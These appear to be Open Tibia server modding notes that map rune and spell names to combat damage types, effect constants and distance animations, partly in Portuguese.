      (COMBAT_PARAM_TYPE, COMBAT_ICEDAMAGE)
      (COMBAT_PARAM_EFFECT, CONST_ME_ICEAREA)
      (COMBAT_PARAM_DISTANCEEFFECT, CONST_ANI_ICE)

      STONESHOWER RUNE id:3175 \/
      (COMBAT_PARAM_TYPE, COMBAT_EARTHDAMAGE)
      (COMBAT_PARAM_EFFECT, CONST_ME_STONES)
      (COMBAT_PARAM_DISTANCEEFFECT, CONST_ANI_EARTH)

      THUNDERSTORM RUNE id:3202 \/
      (COMBAT_PARAM_TYPE, COMBAT_ENERGYDAMAGE)
      (COMBAT_PARAM_EFFECT, CONST_ME_E NERGYHIT)
      (COMBAT_PARAM_DISTANCEEFFECT, CONST_ANI_ENERGYBALL)

      ICICLE RUNE id:3158 \/
      COMBAT_ICEDAMAGE
      CONST_ME_ICEAREA
      CONST_ANI_ICE

      SANTO MÍSSIL RUNA id:3182 \/
      (COMBAT_PARAM_TYPE, COMBAT_HOLYDAMAGE)
      (COMBAT_PARAM_EFFECT, CONST_ME_HOLYDAMAGE)
      (COMBAT_PARAM_EFFECT, CONST_ME_HOLYAREA)
      (COMBAT_PARAM_DISTANCEEFFECT, CONST_ANI_HOLY)

      CONST_ME_PLANTATTACK (exevo gran mas tera)
      CONST_ME_ICETORNADO (exevo gran mas frigo)
      CONST_ME_SMALLPLANTS (exevo tera hur)
      CONST_ME_ICEAREA (exevo frigo hur)
      CONST_ME_ICEATTACK (exori frigo)
      CONST_ME_CARNIPHILA (exori tera)

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      (COMBAT_PARAM_DISTANCEEFFECT, CONST_ANI_SMALLHOLY)
      CONST_ME_HOLYDAM IDADE

      EXEVO MAS SAN \/
      CONST_ME_HOLYAREA
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